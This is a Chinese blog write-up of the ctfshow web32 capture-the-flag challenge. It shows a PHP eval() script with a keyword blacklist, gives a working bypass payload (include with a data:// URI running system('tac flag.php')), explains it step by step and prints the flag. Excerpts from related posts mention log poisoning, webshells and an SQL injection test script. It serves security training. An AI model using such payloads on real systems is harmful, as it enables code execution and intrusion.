【CTFWP】ctfshow-web32

最新推荐文章于 2025-09-25 13:46:09 发布
原创 最新推荐文章于 2025-09-25 13:46:09 发布 · 508 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #ctf

文章目录

题目介绍:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

题目分析:

这段代码是一个 PHP 脚本的一部分,是用于执行用户输入的代码片段。不过,它包含了一些安全漏洞,以下是对代码的分析和潜在问题:

  1. 错误报告关闭

    • error_reporting(0); 这一行关闭了错误报告,这会隐藏可能的错误信息,使得调试和发现问题变得更加困难。

  2. 用户输入处理

    • if(isset($_GET['c'])){ 检查是否接收到了 c 参数。
    • $c = $_GET['c']; 获取 c 参数的值。

  3. 正则表达式过滤

    • if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\|echo|;|(/i", $c)){` 使用正则表达式过滤一些关键词,防止执行一些危险的命令。然而,这个正则表达式并不完全有效,因为它没有考虑到一些其他的潜在危险字符或命令。

  4. 代码执行

    • eval($c); 执行传入的 PHP 代码。这是非常危险的,因为它可以执行任何 PHP 代码,包括恶意代码。

  5. 默认行为

    • else{ highlight_file(__FILE__); } 如果没有接收到 c 参数,脚本会显示当前文件的内容。

潜在问题:

  • 代码注入:由于使用了 eval(),任何有效的 PHP 代码都可以被执行。这可能导致严重的安全问题,如远程代码执行。
  • 过滤不充分:正则表达式过滤可能不够全面,无法阻止所有恶意输入。
  • 错误隐藏:关闭错误报告可能会隐藏一些关键的错误信息,使得问题更难被发现和解决。

payload:

?c=include$_GET[1]?>&1=data://text/plain,<?php system("tac flag.php")?>

payload解释:

这段代码尝试通过 URL 参数传递恶意代码来绕过原始 PHP 脚本中的安全检查。让我们逐步分析:

  1. 参数传递

    • ?c=include$_GET[1]?>&1=data://text/plain,<?php system("tac flag.php")?>
    • 这里使用了 include 语句,尝试将 $_GET[1] 作为文件名来包含。

  2. 原始脚本的正则表达式过滤

    • 原始脚本中的正则表达式尝试过滤掉一些关键词,但存在漏洞。它没有过滤掉 include 这样的关键词。

  3. eval 执行

    • 如果正则表达式匹配失败(即没有匹配到禁止的关键词),则执行 eval($c)

分析:

  • 原始脚本的正则表达式过滤没有考虑到 include 语句的使用,这使得攻击者可以通过构造特定的参数来绕过过滤。
  • 通过构造 ?c=include$_GET[1]?>&1=data://text/plain,<?php system("tac flag.php")?>,攻击者尝试执行 include 语句,从而绕过 eval 函数的限制。

具体步骤:

  1. 参数解析

    • $_GET['c'] 被设置为 include$_GET[1]?>
    • $_GET[1] 被设置为 data://text/plain,<?php system("tac flag.php")?>

  2. 执行

    • 脚本首先尝试执行 eval($_GET['c']),但由于 include 语句不在正则表达式的过滤范围内,它将执行 include $_GET[1]

  3. 文件包含

    • include $_GET[1] 将包含 data://text/plain,<?php system("tac flag.php")?>,这实际上是一个数据 URI,包含 PHP 代码。

  4. 系统命令执行

    • 包含的代码执行 system("tac flag.php"),这将执行系统命令 tac flag.php,可能会泄露或修改文件内容。

flag:

flag=“ctfshow{eeeb78d3-831d-4a1b-bc6d-ff8d2d617768}”

行远自迩,登高自卑。

CTFshow 命令执行 web32
Kradress的博客
10-29 468
源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:56:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c']))
CTFshow 命令执行 web32 33 34 35 36
ChenD的学习笔记
11-08 1306
CTFshow 命令执行 web32 web33 web34 web35 web36
ctfshow web入门 命令执行-web32
最新发布
2301_79697181的博客
09-25 533
构造payload:url/?构造payload:url/?由于没有过滤&,可以利用伪协议将flag.php的内容转变成base64然后赋给a,再将a中的内容显示出来,最后将文件内容进行base64解码。还可以利用php://input伪协议读取flag.php。
ctfshow-web32
weixin_75168674的博客
04-08 977
你传入的?被 eval 执行url是flag.php被读取,源码被 Base64 编码后输出到了页面。
CTFSHOW web入门——web32
m0_74093152的博客
04-23 699
因此可以构造payload:?可以将flag.php文件的内容转变成base64,然后将转换过的flag.php文件赋给a,再将a中的内容显示出来,最后将文件内容进行base64解码即可。过滤了flag、system、php、cat、sort、shell、echo以及一些符号。=是PHP的一个短的开放式标签,是echo()的快捷用法。
ctfshow-web32(命令执行)
m0_62094846的博客
01-21 511
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:56:31 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])...
Ctfshow web入门-web32
qq_45427131的博客
05-13 2166
Ctfshow web入门-web32 WP 拿到url,首先查看源码 过滤了以下字符串 flag|system|php|cat|sort|shell|.| |’|`|echo|;|( 过滤了空格可以用${IFS}和%0a 代替,分号可以用?>代替 但是过滤了括号之后就不能用带有括号的函数,php中include是可以不带括号的函数,和web31一样,这里需要用文件包含 所以构造的Payload是 payload:http://url/?c=include%0a$_POST[1]?>
[ctfshow web入门] web32 使用文件包含绕过
qq_50332504的博客
04-09 1072
本文探讨了绕过PHP过滤限制的多种方法,主要围绕协议利用和信息收集展开。 方法1通过协议实现: 1.1 使用data://协议直接执行系统命令 1.2 通过php://input读取POST数据执行 1.3 使用php://filter以base64或编码转换方式读取文件 方法2利用日志文件: 通过修改User-Agent将恶意代码写入日志,再用include包含日志文件执行代码,最后使用蚁剑连接获取flag。 关键绕过技巧包括: 使用%0a代替空格 利用include无需括号的特性 通过$_GET参数中转
ctfshow-web入门-命令执行(web32-36)
HkD01L的博客
06-25 1298
ctfshow,web入门,命令执行,web32,web33,web34,web35,web36
Bugku CTF web32Web
ChaoYue_miku的博客
03-15 462
0、打开网页,我们发现需要进行文件上传,而且是图片文件 1、写一句话木马,改名为jpg文件后上传 上传成功,接下来抓包修改文件名 2、使用BrupSuite抓包,修改文件拓展名 分别将后缀名修改为php2, php3, php4, php5, phps, pht, phtm, phtml(php的别名),发现只有php4没有被过滤 注意这里有两处修改,第一处是大小写绕过 3、使用菜刀连接,查看根目录 4、得到flag:flag{e46b352d86f8f08b2
ctfshow web入门 命令执行部分(32-36)
羽的博客
09-05 3616
以下目测均为非预期 32 这个题过滤了空格属实有点难受,php中不用括号的有echo include等 过滤了分号可以用?>绕过。 尝试了以下,发现 include"/etc/passwd"?>可以执行成功。再去想下没有过滤$,我们可以用$_POST[1]呀include"\$_POST[1]"?>然后post传参1=/etc/passwd执行成功。还有一个问题include包含php文件不会在页面显示出来,灵机一动,伪协议呀!完美 33 payload ?c=include$_POST
ctfshow web_入门31,32
uwvwko的博客
12-21 533
var/log/nginx/access.log是nginx默认的access日志路径。从带有 GET 方法的表单发送的信息,对任何人都是可见的(会显示在浏览器的地址栏)$_GET 变量是一个数组,内容是由 HTTP GET 方法发送的变量名称和值。get提交一个1,在1里面写命令,命令就可以用多种写法。当然,也可以用bp抓包,写入一句话木马,然后用蚁剑连接。没有过滤passthru,但是过滤空格。>可以用%3E替代,“;base64解密即得,or。当然也可以用post提交。——使用php伪协议。
CTFSHOW-WEB入门-命令执行29-32
2301_80024722的博客
01-29 879
【代码】CTFSHOW-WEB入门-命令执行29-32
CTFshow-Web入门》04. Web 31~40
学习学习学习......
12-03 1483
eval() 利用与正则绕过,PHP 伪协议、include() 利用。
ctf web方向与php学习记录32
这周末在做梦的博客
02-02 301
这里分享一道2021“春秋杯”的fungame——十二宫的挑衅 (填坑说明:近期遇到两个瓶颈,还在搞。一个py的坑,一个waf的坑,克服之后一定会填,请勿逐渐暴躁,毕竟这周末在做梦呢。。。。) 首先,看到一张图片,然后binwalk,然后发现zlib,然后就没有然后了,这是错误的思路。。。。。。。 正确思路: 首先,百度十二宫的密码解密,若干年之后,在B站发现了一个视频,小破站nb! https://www.bilibili.com/video/BV1Ra411F7tv(2’17之后有详解)。 其次,可以发
CTFshow-命令执行
qq_60905276的博客
07-04 862
CTFshow-命令执行
ctfshow-web入门-命令执行(web30-web36)
Welcome To My6n Blog
06-06 1782
命令执行,需要严格的过滤。
ctfshow web入门---文件执行 解题思路
qq_73767109的博客
04-20 1787
ctfshow web入门(web29-web59)解题思路与方法
CTFSHOW-web-web4
12-27
### CTF SHOW Web 类别挑战资源与解决方案 对于参与CTF SHOW平台上Web类别的挑战,特别是针对`web4`这一具体题目,可以借鉴一些通用的Web安全漏洞利用技巧以及特定于该平台的经验分享。通常情况下,这类挑战会涉及到常见的Web应用程序漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞(LFI/RFI)等。 为了更好地理解和解决这些挑战,可以从以下几个方面入手: #### 学习基础理论和技术 深入理解HTTP协议的工作原理及其请求响应机制是非常重要的。掌握如何通过浏览器开发者工具分析网络流量可以帮助识别潜在的安全问题[^1]。 #### 利用在线学习资源 有许多优质的网站提供了关于Web渗透测试的学习材料和实践环境,例如OWASP Top Ten项目文档,它列举并解释了当前最严重的Web应用风险;还有像PortSwigger Academy这样的平台提供了一系列课程来教授各种类型的Web漏洞挖掘方法。 #### 参考社区讨论和Writeup 加入相关的技术论坛或社交媒体群组,在那里可以看到其他参赛者发布的writeups(解题报告),这对于获取灵感非常有帮助。GitHub上也有很多开源仓库专门收集整理了不同赛事下的高质量writeup链接集合。 ```python import requests def check_sql_injection(url, param): test_payload = "' OR '1'='1" data = {param: test_payload} response = requests.post(url, data=data) if "Welcome" in response.text: print(f"[+] SQL Injection vulnerability detected on parameter '{param}'!") else: print("[-] No SQL Injection found.") ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值